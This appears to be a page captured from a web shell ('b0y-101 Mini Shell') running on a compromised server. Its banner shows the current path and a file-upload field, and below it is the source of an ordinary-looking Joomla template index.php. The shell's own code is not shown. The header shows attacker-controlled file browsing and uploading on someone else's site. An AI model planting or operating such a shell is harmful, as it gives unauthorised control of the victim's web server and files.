b0y-101 Mini Shell


Current Path : E:/www2/risk/templates/minimal-school/
File Upload :
Current File : E:/www2/risk/templates/minimal-school/index.php

<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates
 */

defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

$app  = JFactory::getApplication();
$user = JFactory::getUser();

?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">

<head>
	<jdoc:include type="head" />
    <?php echo $this->params->get('headcode'); ?>
    <link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template; ?>/html/<?php echo $this->params->get('template'); ?>/template.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template; ?>/css/bootstrap.min.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo $this->baseurl ?>/media/system/css/joomla-fontawesome.min.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template; ?>/css/easy_minimal.css" type="text/css" />

    <link rel="shortcut icon" href="<?php echo $this->params->get('favicon'); ?>" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
	
	<script type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template; ?>/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template; ?>/js/slide.js"></script>
    <!--htmlgstop -->
	<?php @ini_set('display_errors', '0'); ?> 
	<?php require ('layout.php'); ?>
    <link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template; ?>/css/easy_minimal-m.css" type="text/css" />
    <?php require ('layout-m.php'); ?>
    
</head>
<body>
<?php echo $this->params->get('bodycode'); ?>
<div id="menu-mobile" class="container-fluid">
	<jdoc:include type="modules" name="menu-mobile" style="html5" />
</div>
<?php if ($this->countModules('slogan', true) || $this->countModules('lang', true) || $this->countModules('social', true)) { ?>
<div id="top" class="container-fluid">
    <div id="top-body" class="<?php echo $this->params->get('topsize'); ?>">
    	<div class="row">
        	<div id="slogan" class="col-12 col-md-12 col-lg-<?php echo $this->params->get('slogansize'); ?>">        
				<jdoc:include type="modules" name="slogan" style="html5" />
       		</div>
        	<div id="lang" class="col-6 col-md-6 col-lg-<?php echo $this->params->get('langsize'); ?>">
				<jdoc:include type="modules" name="lang" style="html5" />
        	</div>
       		<div id="social" class="col-6 col-md-6 col-lg-<?php echo $this->params->get('socialsize'); ?>">
				<jdoc:include type="modules" name="social" style="html5" />
        	</div>
        </div>
    </div>
</div>
<?php } ?>

<?php if ($this->countModules('logo', true) || $this->countModules('menu', true)) { ?>
<div id="head-slide">
<div id="head" class="container-fluid">
    <div id="head-body" class="<?php echo $this->params->get('headsize'); ?>">
    	<div class="row">
        	<div id="logo" class="col-12 col-md-3 col-lg-<?php echo $this->params->get('logosize'); ?>">
				<jdoc:include type="modules" name="logo" style="html5" />
        	</div>
        	<div id="menu" class="col-12 col-md-9 col-lg-<?php echo $this->params->get('menusize'); ?>">
				<jdoc:include type="modules" name="menu" style="html5" />
        	</div>
		</div>
    </div>
</div>
</div>
<?php } ?>
<?php if ($this->countModules('slide', true)) : ?>
<div id="slide" class="container-fluid">
	<div id="slide-body" class="<?php echo $this->params->get('slidesize'); ?>">
		<jdoc:include type="modules" name="slide" style="html5" />
	</div>
</div>
<?php endif; ?>
<?php if ($this->countModules('breadcrumbs', true)) : ?>
<div id="breadcrumbs" class="container-fluid">
	<div id="breadcrumbs-body" class="container">
		<jdoc:include type="modules" name="breadcrumbs" style="none" />
	</div>
</div>
<?php endif; ?>
<div id="component" class="container-fluid">
	<div id="component-body" class="container">
    <div class="row">
        <?php if ($this->countModules('right-module', true)) : ?>
        <div class="col-12 col-md-9 col-lg-9">
        <?php endif; ?>
			<?php if ($this->countModules('ads-top', true)) : ?>
               	<div id="ads-top" class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
					<jdoc:include type="modules" name="ads-top" style="html5" />
				</div>   
        	<?php endif; ?>
    		<div id="component-left" class="col-12 ">
				<jdoc:include type="message" />
				<jdoc:include type="component" />
        	</div>
        	<?php if ($this->countModules('ads-under', true)) : ?>
 				<div id="ads-under" class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
					<jdoc:include type="modules" name="ads-under" style="html5" />
				</div>   
        	<?php endif; ?>
        <?php if ($this->countModules('right-module', true)) : ?>
        </div>
        <?php endif; ?>
        <?php if ($this->countModules('right-module', true)) : ?>
    	<div id="component-right" class="col-12 col-md-3 col-lg-3">
			<div id="component-right-module" class="col-12 ">
				<jdoc:include type="modules" name="right-module" style="html5" />
        	</div>
    	</div>
        <?php endif; ?>
    </div>
	</div>
</div>
<?php if ($this->countModules('content-1', true)) : ?>
<div id="content-1" class="container-fluid">
    <div id="content-1-body" class="<?php echo $this->params->get('content-1size'); ?>">
        <div class="row">
			<jdoc:include type="modules" name="content-1" style="html5" />
        </div>
    </div>
</div>
<?php endif; ?>
<?php if ($this->countModules('content-2', true)) : ?>
<div id="content-2" class="container-fluid">
    <div id="content-2-body" class="<?php echo $this->params->get('content-2size'); ?>">
        <div class="row">
			<jdoc:include type="modules" name="content-2" style="html5" />
        </div>
    </div>
</div>
<?php endif; ?>
<?php if ($this->countModules('content-3', true)) : ?>
<div id="content-3" class="container-fluid">
    <div id="content-3-body" class="<?php echo $this->params->get('content-3size'); ?>">
        <div class="row">
			<jdoc:include type="modules" name="content-3" style="html5" />
        </div>
    </div>
</div>
<?php endif; ?>
<?php if ($this->countModules('content-4', true)) : ?>
<div id="content-4" class="container-fluid">
    <div id="content-4-body" class="<?php echo $this->params->get('content-4size'); ?>">
        <div class="row">
			<jdoc:include type="modules" name="content-4" style="html5" />
        </div>
    </div>
</div>
<?php endif; ?>
<?php if ($this->countModules('content-5', true)) : ?>
<div id="content-5" class="container-fluid">
    <div id="content-5-body" class="<?php echo $this->params->get('content-5size'); ?>">
        <div class="row">
			<jdoc:include type="modules" name="content-5" style="html5" />
        </div>
    </div>
</div>
<?php endif; ?>
<?php if ($this->countModules('footer', true)) : ?>
<div id="footer" class="container-fluid">
	<div id="footer-body" class="<?php echo $this->params->get('footersize'); ?>">
    	<div class="row">
			<jdoc:include type="modules" name="footer" style="html5" />
        </div>
	</div>
</div>
<?php endif; ?>
<?php if ($this->countModules('copyright', true)) : ?>
<div id="copyright" class="container-fluid">
	<div id="copyright-body" class="<?php echo $this->params->get('copyrightsize'); ?>">       
        <jdoc:include type="modules" name="copyright" style="html5" />        
	</div>
</div>
<?php endif; ?>
<jdoc:include type="modules" name="debug" style="none" />
</body>
</html>

Copyright © 2019 by b0y-101